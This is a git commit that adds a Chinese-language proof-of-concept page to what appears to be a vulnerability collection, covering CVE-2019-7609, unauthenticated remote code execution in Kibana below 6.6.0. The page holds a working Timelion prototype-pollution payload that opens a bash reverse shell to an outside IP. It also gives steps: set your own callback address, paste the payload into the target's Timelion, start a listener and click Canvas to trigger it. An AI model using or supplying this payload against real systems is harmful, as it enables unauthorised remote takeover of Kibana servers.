add CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行

2025-06-20 09:50:19 +00:00 · 2019-10-26 21:15:17 +08:00 · 2019-10-26 21:15:17 +08:00 · 3924835f88
commit 3924835f88
parent e6a1a3cea5
4 changed files with 15 additions and 0 deletions
--- a/CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md
+++ b/CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md
@ -0,0 +1,14 @@
+## CVE-2019-7609-kibana<6.6.0未授权远程代码命令执行
+
+## POC
+将POC里的反链IP地址换成自己的，然后在目标机器上的 `Timelion` 选项下将以下 `POC` 粘贴进去，然后点击 `Run` 运行：  
+
+```
+.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
+.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
+```
+![](./img/Timelion.jpg)  
+
+然后自己机器开启监听，再点击 `Canvas` 即可出发漏洞。  
+![](./img/Canvas.jpg)  
+
--- a/README.md
+++ b/README.md
@ -79,6 +79,7 @@
 - [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md)
 - [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043)
 - [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md)
+- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md)

 ## 提权辅助相关

--- a/img/Canvas.jpg
+++ b/img/Canvas.jpg
--- a/img/Timelion.jpg
+++ b/img/Timelion.jpg